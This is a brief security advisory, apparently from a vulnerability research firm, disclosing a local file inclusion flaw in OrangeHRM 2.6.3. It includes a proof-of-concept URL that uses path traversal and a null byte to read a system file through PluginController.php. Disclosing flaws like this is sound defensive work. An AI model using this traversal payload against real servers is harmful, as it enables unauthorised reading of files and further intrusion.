Home
Consulting
Exploits
Advisories
Software
Papers
Contact

Vulnerability Advisory

Software Vulnerability
OrangeHRM 2.6.3 Local File Inclusion
Threat Tested On Date
4/5
Windows Vista + XAMPP 4/25/2011
Description
A vulnerability in OrangeHRM 2.6.3 can be exploited to include arbitrary files.
Proof of Concept
http://localhost/orangehrm-2.6.3/plugins/PluginController.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00

Copyright © 2018 AutoSec Tools LLC